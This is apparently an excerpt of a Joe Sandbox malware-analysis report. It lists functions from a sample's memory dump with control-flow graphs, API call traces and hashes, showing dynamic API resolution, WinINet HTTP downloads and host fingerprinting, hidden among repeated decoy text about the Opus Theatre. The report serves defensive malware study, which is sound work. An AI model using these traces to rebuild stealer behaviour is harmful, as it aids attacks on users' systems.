                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4712
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E479F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E476E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4784
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E471D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4672
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E478F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4779
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4667
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E47AA
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46D3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46FC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E47CB
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46BD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46B2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46A7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E467D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4693
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4763
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4707
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E47C0
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E46C8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: 758a87d3a8deec1eb3771107cde191b00d31a2d6ba22b5b00a48466c8b445f1b
                                        • Instruction ID: f7ecbb52caa9954a48652a12909caf49b61ee6c9a76449744ca155fd91add639
                                        • Opcode Fuzzy Hash: 758a87d3a8deec1eb3771107cde191b00d31a2d6ba22b5b00a48466c8b445f1b
                                        • Instruction Fuzzy Hash: E44103607D26046BE636BBA6894EFDF7B76FFC2790F405840A9A0522C2DBF45500DB27
                                        Function 004E62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 4e62d0-4e635b call 4faab0 call 4e4800 call 4faa50 InternetOpenA StrCmpCA 1040 4e635d 1033->1040 1041 4e6364-4e6368 1033->1041 1040->1041 1042 4e636e-4e6392 InternetConnectA 1041->1042 1043 4e6559-4e6575 call 4faab0 call 4fab10 * 2 1041->1043 1044 4e654f-4e6553 InternetCloseHandle 1042->1044 1045 4e6398-4e639c 1042->1045 1061 4e6578-4e657d 1043->1061 1044->1043 1047 4e639e-4e63a8 1045->1047 1048 4e63aa 1045->1048 1050 4e63b4-4e63e2 HttpOpenRequestA 1047->1050 1048->1050 1052 4e63e8-4e63ec 1050->1052 1053 4e6545-4e6549 InternetCloseHandle 1050->1053 1055 4e63ee-4e640f InternetSetOptionA 1052->1055 1056 4e6415-4e6455 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1044 1055->1056 1058 4e647c-4e649b call 4f8ad0 1056->1058 1059 4e6457-4e6477 call 4faa50 call 4fab10 * 2 1056->1059 1066 4e649d-4e64a4 1058->1066 1067 4e6519-4e6539 call 4faa50 call 4fab10 * 2 1058->1067 1059->1061 1070 4e64a6-4e64d0 InternetReadFile 1066->1070 1071 4e6517-4e653f InternetCloseHandle 1066->1071 1067->1061 1074 4e64db 1070->1074 1075 4e64d2-4e64d9 1070->1075 1071->1053 1074->1071 1075->1074 1079 4e64dd-4e6515 call 4facc0 call 4fabb0 call 4fab10 1075->1079 1079->1070
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004E4889
                                          • Part of subcall function 004E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004E4899
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • InternetOpenA.WININET(00500DFF,00000001,00000000,00000000,00000000), ref: 004E6331
                                        • StrCmpCA.SHLWAPI(?,0145E888), ref: 004E6353
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004E6385
                                        • HttpOpenRequestA.WININET(00000000,GET,?,0145E208,00000000,00000000,00400100,00000000), ref: 004E63D5
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004E640F
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004E6421
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004E644D
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004E64BD
                                        • InternetCloseHandle.WININET(00000000), ref: 004E653F
                                        • InternetCloseHandle.WININET(00000000), ref: 004E6549
                                        • InternetCloseHandle.WININET(00000000), ref: 004E6553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 0dd9cc19555f8dae7ad65257a430dbd4f9fc55d47c60c00ce2866589c4a965a1
                                        • Instruction ID: 52046e943e2fb820a4a303393d8f8288c9784df0c9cc6f31895daefca7c87cc9
                                        • Opcode Fuzzy Hash: 0dd9cc19555f8dae7ad65257a430dbd4f9fc55d47c60c00ce2866589c4a965a1
                                        • Instruction Fuzzy Hash: 90719FB1A0025CABDB14DFA1DC49FEE7774BB44304F10819AF60A6B1D4DBB86A84CF59
                                        Function 004F7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 4f7690-4f76da GetWindowsDirectoryA 1357 4f76dc 1356->1357 1358 4f76e3-4f7757 GetVolumeInformationA call 4f8e90 * 3 1356->1358 1357->1358 1365 4f7768-4f776f 1358->1365 1366 4f778c-4f77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 4f7771-4f778a call 4f8e90 1365->1367 1368 4f77a9-4f77b6 call 4faa50 1366->1368 1369 4f77b8-4f77e8 wsprintfA call 4faa50 1366->1369 1367->1365 1377 4f780e-4f781e 1368->1377 1369->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004F76D2
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004F770F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7793
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F779A
                                        • wsprintfA.USER32 ref: 004F77D0
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: cd683661083a60c87372f23c70b40e2a289950e911d7361bb92cceb4eb28ccb6
                                        • Instruction ID: f27afa54df4b2d0e7ea002f7fec53e40266aa35cf25e64beddf885f962f8cfb8
                                        • Opcode Fuzzy Hash: cd683661083a60c87372f23c70b40e2a289950e911d7361bb92cceb4eb28ccb6
                                        • Instruction Fuzzy Hash: 7D4154B1D0425C9BDF10DB94DC85FEEB7B8AB48704F104199F609AB280D77CAA44CBA9
                                        Function 004F79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004E11B7), ref: 004F7A10
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7A17
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 004F7A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: 4a0a563ea26782bc450b8e60dcce985c55abe6d29a7248019c2a932ef54084e3
                                        • Instruction ID: d7a8cb70825519e9532cba87c500ee2e3a4ae11575a8dd3fdb61da64dd9c0de6
                                        • Opcode Fuzzy Hash: 4a0a563ea26782bc450b8e60dcce985c55abe6d29a7248019c2a932ef54084e3
                                        • Instruction Fuzzy Hash: 96F04FB1D48609EBCB04DF98DD45FAEBBB8FB45711F10421AF615A2780C7795500CBA5
                                        Function 004E1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 3f4b10bee990563b3817c78f7aebb62536f6c4ad99143573b77f116fbef9b3d2
                                        • Instruction ID: 728185f6076ce34483ac7dad8b1fc19288144c2f6334024d7391c5c6a9394881
                                        • Opcode Fuzzy Hash: 3f4b10bee990563b3817c78f7aebb62536f6c4ad99143573b77f116fbef9b3d2
                                        • Instruction Fuzzy Hash: 0DD05E7490430C9BCB04DFE49949ADDBB78BB8C216F000655D90572240EA345441CA79
                                        Function 004F9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 633 4f9f20-4f9f2a 634 4fa346-4fa3da LoadLibraryA * 8 633->634 635 4f9f30-4fa341 GetProcAddress * 43 633->635 636 4fa3dc-4fa451 GetProcAddress * 5 634->636 637 4fa456-4fa45d 634->637 635->634 636->637 638 4fa526-4fa52d 637->638 639 4fa463-4fa521 GetProcAddress * 8 637->639 640 4fa52f-4fa5a3 GetProcAddress * 5 638->640 641 4fa5a8-4fa5af 638->641 639->638 640->641 642 4fa647-4fa64e 641->642 643 4fa5b5-4fa642 GetProcAddress * 6 641->643 644 4fa72f-4fa736 642->644 645 4fa654-4fa72a GetProcAddress * 9 642->645 643->642 646 4fa738-4fa7ad GetProcAddress * 5 644->646 647 4fa7b2-4fa7b9 644->647 645->644 646->647 648 4fa7ec-4fa7f3 647->648 649 4fa7bb-4fa7e7 GetProcAddress * 2 647->649 650 4fa825-4fa82c 648->650 651 4fa7f5-4fa820 GetProcAddress * 2 648->651 649->648 652 4fa922-4fa929 650->652 653 4fa832-4fa91d GetProcAddress * 10 650->653 651->650 654 4fa98d-4fa994 652->654 655 4fa92b-4fa988 GetProcAddress * 4 652->655 653->652 656 4fa9ae-4fa9b5 654->656 657 4fa996-4fa9a9 GetProcAddress 654->657 655->654 658 4faa18-4faa19 656->658 659 4fa9b7-4faa13 GetProcAddress * 4 656->659 657->656 659->658
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,01445710), ref: 004F9F3D
                                        • GetProcAddress.KERNEL32(74DD0000,01445730), ref: 004F9F55
                                        • GetProcAddress.KERNEL32(74DD0000,01459610), ref: 004F9F6E
                                        • GetProcAddress.KERNEL32(74DD0000,014595B0), ref: 004F9F86
                                        • GetProcAddress.KERNEL32(74DD0000,014595C8), ref: 004F9F9E
                                        • GetProcAddress.KERNEL32(74DD0000,014595E0), ref: 004F9FB7
                                        • GetProcAddress.KERNEL32(74DD0000,0144B980), ref: 004F9FCF
                                        • GetProcAddress.KERNEL32(74DD0000,0145CFE8), ref: 004F9FE7
                                        • GetProcAddress.KERNEL32(74DD0000,0145D048), ref: 004FA000
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE68), ref: 004FA018
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF28), ref: 004FA030
                                        • GetProcAddress.KERNEL32(74DD0000,01445970), ref: 004FA049
                                        • GetProcAddress.KERNEL32(74DD0000,014457D0), ref: 004FA061
                                        • GetProcAddress.KERNEL32(74DD0000,01445750), ref: 004FA079
                                        • GetProcAddress.KERNEL32(74DD0000,01445770), ref: 004FA092
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF40), ref: 004FA0AA
                                        • GetProcAddress.KERNEL32(74DD0000,0145D030), ref: 004FA0C2
                                        • GetProcAddress.KERNEL32(74DD0000,0144BC00), ref: 004FA0DB
                                        • GetProcAddress.KERNEL32(74DD0000,01445810), ref: 004FA0F3
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF88), ref: 004FA10B
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE20), ref: 004FA124
                                        • GetProcAddress.KERNEL32(74DD0000,0145CEC8), ref: 004FA13C
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE50), ref: 004FA154
                                        • GetProcAddress.KERNEL32(74DD0000,01445990), ref: 004FA16D
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF58), ref: 004FA185
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE38), ref: 004FA19D
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF70), ref: 004FA1B6
                                        • GetProcAddress.KERNEL32(74DD0000,0145D060), ref: 004FA1CE
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE80), ref: 004FA1E6
                                        • GetProcAddress.KERNEL32(74DD0000,0145D078), ref: 004FA1FF
                                        • GetProcAddress.KERNEL32(74DD0000,0145CEE0), ref: 004FA217
                                        • GetProcAddress.KERNEL32(74DD0000,0145CFB8), ref: 004FA22F
                                        • GetProcAddress.KERNEL32(74DD0000,0145D090), ref: 004FA248
                                        • GetProcAddress.KERNEL32(74DD0000,0145A1F0), ref: 004FA260
                                        • GetProcAddress.KERNEL32(74DD0000,0145CDF0), ref: 004FA278
                                        • GetProcAddress.KERNEL32(74DD0000,0145CFA0), ref: 004FA291
                                        • GetProcAddress.KERNEL32(74DD0000,014459B0), ref: 004FA2A9
